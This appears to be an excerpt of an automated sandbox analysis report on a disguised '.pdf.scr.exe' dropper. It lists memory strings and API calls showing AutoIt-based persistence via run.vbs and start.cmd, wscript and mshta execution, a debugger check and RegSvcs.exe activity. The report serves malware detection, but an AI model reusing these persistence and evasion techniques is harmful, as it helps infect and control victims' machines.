      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesnaryx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablescd23e39753777_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesciiarray9767m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmdd
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmd720f4bc51747{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591rosor
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \run.vbs9c720ee97637d6i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \run.vbsg
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.shell
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupdir720f4bc51747
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshell.run= wscript.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.quit
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablescd21f2a6447d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_dword
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdirrtnamec59767
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etaskmgr9fd2df5a1406c4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreate
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b06967
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etaskmgr
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const hidden = 01406c4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.lnk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.cmd"720f4bc51747
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c32bf4bb517f770c.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c]
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247cl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb1cd5876247531994bcce137cbe4f905f4178f006
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ez
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd23e39753777f38a797eb0855807ea04f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247crentversion\polici
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = wscript.createobject(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: persistence-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600cs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exests
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770cf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d617
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdirte
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regsvcs.exest
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: delay
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutexc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exese
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c717\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbsb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _msgbox
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c22ff4bc756a603ab4a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k3ysx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tla&t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s_start
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @0xct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @7xdt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @phct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @m8ct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wxct
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00BA3312
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0EBE5 mouse_event,6_2_00C0EBE5
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C013F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_00C013F2
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006CB1000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerg
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000031BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: ihgsvw.exeBinary or memory string: Shell_TrayWnd
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000030D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@K
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\2+
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
      Source: ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inGetText("Program Manager") = "0" Then
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_003EAF0F
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF654 cpuid 0_2_003EF654
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_003EDF1E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BFE5F8 GetUserNameW,6_2_00BFE5F8
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DB146 GetVersionExW,0_2_003DB146
